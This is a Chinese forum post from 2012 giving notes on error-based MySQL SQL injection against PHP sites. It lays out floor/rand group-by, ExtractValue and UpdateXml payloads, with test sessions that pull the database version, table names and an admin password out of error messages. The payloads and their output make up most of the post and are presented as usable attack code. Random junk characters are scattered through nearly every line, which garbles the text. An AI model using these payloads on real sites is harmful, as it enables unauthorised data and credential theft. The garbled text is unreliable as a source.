放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。
, c' r( k5 s( ?4 g/ b9 s实际测试环境:
! P6 N: B+ T& b
- n( Q6 Q- x8 v/ k% P- ] 0 B5 a0 D% b, x- N
mysql> show tables;
+ r+ U5 t s9 O) j- }3 B+----------------+& Y+ }' v# w/ r+ \- K: s, H
| Tables_in_test |0 O8 P+ e" x" j; f2 x
+----------------+
+ ~6 O6 ], o# U$ n; M| admin |; F/ n8 H! P* {8 P1 j0 u7 a# c
| article |- U1 c* f( A$ ?, C$ @+ k2 N6 _
+----------------+5 s, X9 W( y! w$ F
$ c& _' F: ^; j, V$ S
* w3 Y$ R7 f5 H) Q1 l5 Y) u: P7 A. ?: j
: a r; _. `5 K: ^
mysql> describe admin;2 w0 | ~: O! N" T9 [) J# Q# n
+-------+------------------+------+-----+---------+----------------+
0 Z6 q6 B' `) H6 C| Field | Type | Null | Key | Default | Extra |
" {& I) o& c. x# @+-------+------------------+------+-----+---------+----------------+
# _7 {6 }% a6 H5 r# R" f' ~| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
6 H# L; C p4 b5 s$ o X| user | varchar(50) | NO | | NULL | |
( Z* p, G% ?6 W+ [0 \| pass | varchar(50) | NO | | NULL | |
, _8 n$ U' F6 R9 G# F9 t' r$ J/ Q+-------+------------------+------+-----+---------+----------------+
! w4 ~% x# n; B& H% ~1 Z & o. e% Z: n, H' _+ C
" t3 j0 O5 U; Z( Z
% m2 }+ k, i( ?, @0 j7 f' n9 p" qmysql> describe article;
( I* T3 u0 H2 ?! l2 L' O( ?+---------+------------------+------+-----+---------+----------------+
?5 E, G5 v3 J: ^0 S1 `5 Y* @| Field | Type | Null | Key | Default | Extra |/ [8 T, O, V' ^6 A: k
+---------+------------------+------+-----+---------+----------------+
; D; K1 ^0 V" t8 u l| id | int(10) unsigned | NO | PRI | NULL | auto_increment |: W o; ^) Y0 e* t# c8 k2 G1 m
| title | varchar(50) | NO | | NULL | | q6 e% V o3 v! d u
| content | varchar(50) | NO | | NULL | |( c8 }8 J' d3 T c/ i
+---------+------------------+------+-----+---------+----------------+
6 q$ |3 ]; b* @' g3 M1、通过floor报错- t& g: ?& b" {7 ^, u0 \
可以通过如下一些利用代码 ?+ ^6 K, ]) e% m
5 p1 W$ ~. L% Q2 T% O( B6 P) c
! C( q( i- U! _2 O& Kand select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
3 p [6 z- X+ ~9 J; R* @4 I$ tfrom information_schema.tables group by x)a);) a% d* B) ?6 i! y% N a
: Y" G5 x! }/ U$ F2 @# c8 d0 @0 d
8 T9 R2 N7 ?8 u) ^4 P7 h' band (select count(*) from (select 1 union select null union select !1)x1 } l) E3 Z) `( x
group by concat((select table_name from information_schema.tables limit 1),4 x. A4 t' u6 b2 `
floor(rand(0)*2)));
" ~$ V1 [1 q$ X9 p; C举例如下:: D4 t4 f( [: \' g! {! x
首先进行正常查询:; G+ c- ]. g8 u
; I" v1 i" x. `, \, Amysql> select * from article where id = 1;# J: j$ E# L% o6 e4 M/ E2 J+ h
+----+-------+---------+ C1 z6 d4 ~! F. b0 o3 F
| id | title | content |
( S; y$ Y1 [; D5 ?: s+ Y+----+-------+---------+: d H# E$ }7 \
| 1 | test | do it |" j% ]* y9 f+ V c% V, e) @( n
+----+-------+---------+, s- Z# w9 L& Y; U1 }% F; j
假如id输入存在注入的话,可以通过如下语句进行报错。$ i! \+ p* P8 c% G9 d7 I
# @6 G8 C% c8 Y$ Y' C
) K9 C+ ?- q n9 j/ V) Mmysql> select * from article where id = 1 and (select 1 from' P( e1 K0 p M) m5 E7 s7 `& e0 U
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);. `" W! s$ ]! Z- q z. ?
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'* A' c& r- J( J0 i& _& L4 y# Z
可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
* n4 h/ s+ z: j9 y7 W! z例如我们需要查询管理员用户名和密码:; W- d' j, w8 h7 t7 m6 z" |
Method1:
: _2 ]% Z) ^& f( E: |9 U ) ^/ ~9 Q5 ~2 ~1 T) W
, b* h0 ]- K+ d5 f7 x% k; Vmysql> select * from article where id = 1 and (select 1 from
# l/ g1 J/ I- `- s6 T4 h3 }- D1 I2 D(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
" w. W5 V3 u; ?from information_schema.tables group by x)a);
0 y" H7 f8 z+ Z/ f- w2 uERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'* H2 n2 C& k4 G Z7 v
Method2:
" j+ Q4 I5 f, Q* ?5 ^% C( C
# y* k0 W' ^: B+ M. V$ } # F/ @2 d/ {9 h" c- l6 X0 t
mysql> select * from article where id = 1 and (select count(*)6 _: l# e7 V" D& M3 n# r" F- ]
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
* j8 q0 H N( ~. gfloor(rand(0)*2)));3 W! ?- ^, W. L; \9 z0 J* J. J `
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'7 [3 \5 k7 I k- J( p0 G( U
2、ExtractValue
' ]1 {8 i% z# c( q6 A$ M测试语句如下
2 G3 E0 \6 ?) a0 P; {! J* h" G
- S1 J+ {8 T3 N+ }' D o ( @4 `1 _2 d' B9 d( B: s
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
; t4 F9 y. \& _! `' L7 X实际测试过程7 A2 Y' i& Q) Z. X: k3 `9 @
. p: Q* S0 O( P# V 5 ]/ l7 N3 C# [, ?2 d- ]
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,- c; V5 @2 V2 E0 S
(select pass from admin limit 1)));--
h7 Q# [1 F. a. g3 j$ H- \" pERROR 1105 (HY000): XPATH syntax error: '\admin888'
; Q r& p/ \' `7 T/ K% Q& z3 G3、UpdateXml
/ K0 ~0 y! Y5 @- Q. k- \( m测试语句
5 ? ~/ G/ i1 h* N! A* U H
4 Y& T0 v) M, f- z( k, }
3 R1 Y# }$ W& B& w1 O. u; R Cand 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1)) v( K6 o: M! j) T5 ?2 B* t- v% Y+ B
实际测试过程
4 ]8 E4 P! F- U0 @- A" A7 t / q4 {2 ^# n! V
, k) ]$ V# m2 A0 emysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,( M9 V% G+ r8 `) O
(select pass from admin limit 1),0x5e24),1));: \' G/ q0 c2 Q) i5 P# m4 R% N
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'7 j4 b2 |0 I/ ?
All, thanks foreign guys.9 o7 k6 ^& g$ B7 u9 @
0 L3 c& t. A. `
6 b# R; G! T4 o! ^4 I- ^ |
发表于 2012-12-10 10:28:51
收藏
支持
反对